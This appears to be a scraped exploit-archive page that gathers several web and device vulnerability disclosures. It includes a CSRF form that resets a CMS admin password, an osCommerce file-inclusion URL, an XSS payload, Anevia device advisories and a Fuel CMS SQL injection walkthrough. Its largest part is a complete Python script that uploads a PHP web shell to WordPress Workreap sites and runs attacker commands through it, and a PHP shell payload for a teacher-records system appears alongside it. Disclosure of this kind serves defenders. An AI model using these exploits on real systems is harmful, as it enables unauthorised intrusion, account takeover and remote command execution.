Pannres-Idence CMS version 7.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Pannres-idence CMS 7.3 CSRF Vulnerability                                                                          |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |   
| # Vendor    : https://codecanyon.net/item/pannresidence-classified-ads-php-script/19960675?s_rank=189                            |    
| # Dork      : "Bylancer, All right reserved"                                                                                     |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html Will modify the password for the site manager, as well as change the e-mail.

[+] save code as poc.html .

<form class="form-horizontal" action="http://127.0.0.1/pannresidencecom/backend/add_newPassword.php" name="form2" id="form2">

                            <fieldset>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="password" id="password" class="form-control" placeholder="Your new password." type="password">  
                                    </div>  
                                </div>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">

                                    </div>  
                                </div>

                                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="newEmail" value="" class="form-control" type="email">

                                    </div>  
                                </div>

                                                            </fieldset>

                            <div class="">  
                                <div class="row">  
                                    <div class="col-md-12">  
                                        <button class="btn btn-default" type="clear">  
                                            Cancel  
                                        </button>

                                        <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">  
                                            <i class="fa fa-save"></i>  
                                            Submit  
                                        </button>  
                                    </div>  
                                </div>  
                            </div>

                        </form>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Pannres-Idence CMS 7.3 Cross Site Request Forgery

osCommerce version 4 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : oscommerce V4 LFI Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.oscommerce.com/                                                                                        |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 62  : https://github.com/osCommerce/osCommerce-V4/blob/main/install/index.php[+] http://locqlhost/install/index.php?rootPath=../../includes/local/configure.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

osCommerce 4 Local File Inclusion

WordPress theme Workreap version 2.2.2 suffers from a remote shell upload vulnerabilities.

    # Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution# Dork: inurl:/wp-content/themes/workreap/# Date: 2023-06-01# Category : Webapps# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)# Version: 2.2.2# Tested on: Windows/Linux# CVE: CVE-2021-24499import requestsimport randomimport stringimport sysdef usage():    banner = '''    NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution    usage: python3 Workreap_rce.py <URL>     example for linux : python3 Workreap_rce.py https://www.exploit-db.com    example for Windows : python Workreap_rce.py https://www.exploit-db.com    '''    print(f"{BOLD}{banner}{ENDC}")def upload_file(target):    print("[ ] Uploading File")    url = target + "/wp-admin/admin-ajax.php"    body = "<?php echo '" + random_str + "';?>"    data = {"action": "workreap_award_temp_file_uploader"}    response = requests.post(url, data=data, files={"award_img": (file_name, body)})    if '{"type":"success",' in response.text:        print(f"{GREEN}[+] File uploaded successfully{ENDC}")        check_php_file(target)    else:        print(f"{RED}[+] File was not uploaded{ENDC}")def check_php_file(target):    response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name)    if random_str in response_2.text:        print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")        print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name)        question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")        if question == "y" or question == "Y":            print("[ ] Uploading Shell ")            get_rce(target)        else:            usage()    else:        print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}")def get_rce(target):    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"    body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'    data = {"action": "workreap_award_temp_file_uploader"}    response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)})    print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")    while True:        command = input(f"{YELLOW}Enter a command to execute: {ENDC}")        print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}")        response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}")        print(f"{GREEN}{response_4.text}{ENDC}")if __name__ == "__main__":    global GREEN , RED, YELLOW, BOLD, ENDC    GREEN = '\033[92m'    RED = '\033[91m'    YELLOW = '\033[93m'    BOLD = '\033[1m'    ENDC = '\033[0m'    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"    random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))    try:        upload_file(sys.argv[1])    except IndexError:            usage()    except requests.exceptions.RequestException as e:        print("\nPlease Enter Valid Address")

WordPress Workreap 2.2.2 Shell Upload

Once the admin establishes a secure shell session, she gets dropped into a sandboxed environment using the login binary that allows specific set of commands. One of those commands that can be exploited to escape the jailed shell is traceroute. A remote attacker can breakout of the restricted environment and have full root access to the device.

Title: Anevia Flamingo XL 3.2.9 (login) Remote Root Jailbreak  
Advisory ID: ZSL-2023-5780  
Type: Local/Remote  
Impact: System Access, DoS, Security Bypass  
Risk: (4/5)  
Release Date: 11.06.2023

**Summary**

Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

**Description**

Once the admin establishes a secure shell session, she gets dropped into a sandboxed environment using the login binary that allows specific set of commands. One of those commands that can be exploited to escape the jailed shell is traceroute. A remote attacker can breakout of the restricted environment and have full root access to the device.

**Vendor**

Ateme - https://www.ateme.com

**Affected Version**

3.2.9  
Hardware revision 1.0  
SoapLive 2.0.3

**Tested On**

GNU/Linux 3.1.4 (x86\_64)  
Apache/2.2.15 (Unix)  
mod\_ssl/2.2.15  
OpenSSL/0.9.8g  
DAV/2  
PHP/5.3.6

**Vendor Status**

\[13.04.2023\] Vulnerability discovered.  
\[13.04.2023\] Vendor contacted.  
\[10.06.2023\] No response from the vendor.  
\[11.06.2023\] Public security advisory released.

**PoC**

anevia\_jailbreak.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5777.php

**Changelog**

\[11.06.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Anevia Flamingo XL 3.2.9 (login) Remote Root Jailbreak

The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Also, the application suffers from Insufficient Session Expiration vulnerability.

Title: Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution  
Advisory ID: ZSL-2023-5778  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (4/5)  
Release Date: 11.06.2023

**Summary**

Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

**Description**

The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Also, the application suffers from Insufficient Session Expiration vulnerability.

**Vendor**

Ateme - https://www.ateme.com

**Affected Version**

3.6.5  
Hardware revision: 1.1  
SoapLive 2.4.0  
SoapSystem 1.3.1

**Tested On**

GNU/Linux 3.14.29 (x86\_64)  
Apache/2.2.22 (Debian)  
PHP/5.6.0-0anevia2

**Vendor Status**

\[13.04.2023\] Vulnerability discovered.  
\[13.04.2023\] Vendor contacted.  
\[10.06.2023\] No response from the vendor.  
\[11.06.2023\] Public security advisory released.

**PoC**

anevia\_rce.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[11.06.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Anevia Flamingo XS 3.6.5 Authenticated Root Remote Code Execution

The device uses a weak set of default and hard-coded administrative credentials that can be easily guessed in remote password attacks and gain full control of the system.

Title: Anevia Flamingo XL/XS 3.6.x Default/Hard-coded Credentials  
Advisory ID: ZSL-2023-5777  
Type: Local/Remote  
Impact: Privilege Escalation, System Access, DoS  
Risk: (4/5)  
Release Date: 11.06.2023

**Summary**

Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

**Description**

The device uses a weak set of default and hard-coded administrative credentials that can be easily guessed in remote password attacks and gain full control of the system.

**Vendor**

Ateme - https://www.ateme.com

**Affected Version**

3.6.20, 3.2.9  
Hardware revision 1.1, 1.0  
SoapLive 2.4.1, 2.0.3  
SoapSystem 1.3.1

**Tested On**

GNU/Linux 3.14.29 (x86\_64)  
Apache/2.2.22 (Debian) PHP/5.6.0

**Vendor Status**

\[13.04.2023\] Vulnerability discovered.  
\[13.04.2023\] Vendor contacted.  
\[10.06.2023\] No response from the vendor.  
\[11.06.2023\] Public security advisory released.

**PoC**

anevia\_creds.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[11.06.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Anevia Flamingo XL/XS 3.6.x Default/Hard-coded Credentials

Title: Anevia Flamingo XL 3.6.20 Authenticated Root Remote Code Execution  
Advisory ID: ZSL-2023-5779  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (4/5)  
Release Date: 11.06.2023

**Summary**

Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

**Description**

The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Also, the application suffers from Insufficient Session Expiration vulnerability.

**Vendor**

Ateme - https://www.ateme.com

**Affected Version**

3.6.20, 3.2.9  
Hardware revision 1.1, 1.0  
SoapLive 2.4.1, 2.0.3  
SoapSystem 1.3.1

**Tested On**

GNU/Linux 3.1.4 (x86\_64)  
Apache/2.2.15 (Unix)  
mod\_ssl/2.2.15  
OpenSSL/0.9.8g  
DAV/2  
PHP/5.3.6

**Vendor Status**

\[13.04.2023\] Vulnerability discovered.  
\[13.04.2023\] Vendor contacted.  
\[10.06.2023\] No response from the vendor.  
\[11.06.2023\] Public security advisory released.

**PoC**

anevia\_root.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[11.06.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Anevia Flamingo XL 3.6.20 Authenticated Root Remote Code Execution

A vulnerability, which was classified as critical, has been found in PHPGurukul Teachers Record Management System 1.0. Affected by this issue is some unknown functionality of the file /changeimage.php of the component Profile Picture Handler. The manipulation of the argument newpic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231176.

Permalink

Cannot retrieve contributors at this time

**TEACHER RECORD MANAGEMENT SYSTEM v1.0-POC****TITLE**

*   Teachers Record Management System 1.0 – File Upload Type Validation Error in /changeimage.php

**DESCRIPTION**

The upload functionality of updating user profile does not properly validate the file content-type,
filename, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89)
and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content
that will be executed in the context of the domain.

**STEPS-TO-REPRODUCE**

1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”
Password: Test@123”
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
3. Open the Burp-suite and Intercept the Edit Image Request
4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”
5. Change the \*\*Content-type from “ image/png “ to “ image/jpg “
6. And Add this \*\*Payload\*\* : \`GIF89a <?php echo system($\_REQUEST\['dx'\]); ?>\`
7. Where \*\*GIF89a is the GIF magic bytes this bypass the file upload extension\*\*
8. Below is the Burpsuite-POST Request for all the changes that I have made above1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com
Password: Test@123”
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
3. Open the Burp-suite and Intercept the Edit Image Request
4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”
5. Change the Content-type from “ image/png “ to “ image/jpg “
6. And Add this Payload : \`GIF89a <?php echo system($\_REQUEST\['dx'\]); ?>\`
7. Where GIF89a is the GIF magic bytes this bypass the file upload extension
8. Below is the Burpsuite-POST Request for all the changes that I have made above

**BURPSUITE\_POST\_REQUEST**

POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not\_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: <http://localhost>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <http://localhost/trms/teacher/changeimage.php>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"

John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($\_REQUEST\['dx'\]); ?>

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryndAPYa0GGOxSUHdF--

**PROOF\_OF\_CONCEPT**

CVE-2023-3187: Vulnerability/trms.md at main · ctflearner/Vulnerability

Fuel CMS v1.5.2 was discovered to contain a SQL injection vulnerability via the id parameter at /controllers/Blocks.php.

https://github.com/daylightstudio/FUEL-CMS download source code

login required.

fuel/modules/fuel/controllers/Blocks.php

line 64 import_view method starts

Line 70 receives the id parameter of the post request and enters the import method

fuel/modules/fuel/libraries/Fuel\_blocks.php

Then enter the find_by_key method on line 307

Because the find_by_key method does not exist, enter the __call method of the current object

Enter line 4421 of MY\_Model.php, pass parameters to $this->db->where() method

At this time, the external input string is spliced into the SQL statement through the $this->db->where() method, But at this time, the external input will be surrounded by single quotes because of codeigniter's safe processing of the where method, so the injection has not yet been caused..

Until line 4450, the user's external input is stored in the $other_args array at this time, and has not been processed safely

Enter the $this->db->order_by() method, at this time the external input is spliced into the sql statement again, and there is no single quotation mark included

Finally, the $this->db->get() method executes the database command, causing sql injection

sqlmap:

CVE-2023-33557: fuel-cms-sqlinjection/README.md at main · bcvgh/fuel-cms-sqlinjection

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

**P2S CMS 0.1 Cross Site Scripting**

Posted Jun 9, 2023

Authored by indoushka

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7bb6a5d8c0fb7077e0992b71833738c252f38ebb48abe398cde8f60022fba24c

Download | Favorite | View

**P2S CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : P2s-cms v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://www.primestart.net/                                                                                        || # Dork      : index.php?page=busca&palavra=                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/avamcombr/index.php?page=busca&palavra=%3Cscript%3Ealert(/indoushka/);%3C/script%3E        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,354)
*   Arbitrary (16,067)
*   BBS (2,859)
*   Bypass (1,694)
*   CGI (1,024)
*   Code Execution (7,157)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,317)
*   DoS (23,189)
*   Encryption (2,363)
*   Exploit (51,175)
*   File Inclusion (4,195)
*   File Upload (955)
*   Firewall (821)
*   Info Disclosure (2,720)
*   Intrusion Detection (884)
*   Java (3,002)
*   JavaScript (841)
*   Kernel (6,577)
*   Local (14,393)
*   Magazine (586)
*   Overflow (12,614)
*   Perl (1,423)
*   PHP (5,124)
*   Proof of Concept (2,302)
*   Protocol (3,567)
*   Python (1,509)
*   Remote (30,515)
*   Root (3,556)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,854)
*   Shell (3,163)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,234)
*   TCP (2,394)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,597)
*   Web (9,571)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,693)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,979)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,758)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (344)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,866)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,370)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,652)
*   UNIX (9,246)
*   UnixWare (186)
*   Windows (6,557)
*   Other

Tag

#php